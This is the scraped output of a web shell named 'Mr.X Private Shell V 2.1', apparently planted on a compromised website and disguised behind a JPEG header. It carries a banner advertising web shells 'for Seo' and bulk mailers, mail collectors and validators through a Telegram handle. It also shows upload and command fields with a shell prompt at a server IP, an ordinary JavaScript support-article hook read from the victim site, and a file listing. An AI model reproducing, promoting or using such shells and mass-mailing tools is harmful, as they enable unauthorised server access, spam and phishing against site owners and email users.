����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

fistvdlb@216.73.217.65: ~ $
import { KB_HOST } from '@constants';
import useSWRImmutable from 'swr/immutable';

export const fetcher = (slug) => {
	const lang = window.extSharedData.wpLanguage || null;
	const params = new URLSearchParams({ lang });
	return fetch(`${KB_HOST}/api/posts/${slug}?${params.toString()}`).then(
		(res) => {
			if (res.status === 404) throw new Error('Not found');
			if (!res.ok) throw new Error(res.statusText);
			return res.json();
		},
	);
};

export const useSupportArticle = (slug) => {
	const { data, error } = useSWRImmutable(slug, fetcher);
	return { data, error, loading: !data && !error };
};

Filemanager

Name Type Size Permission Actions
useRouter.js File 3.39 KB 0644
useSearchArticles.js File 623 B 0644
useSupportArticles.js File 604 B 0644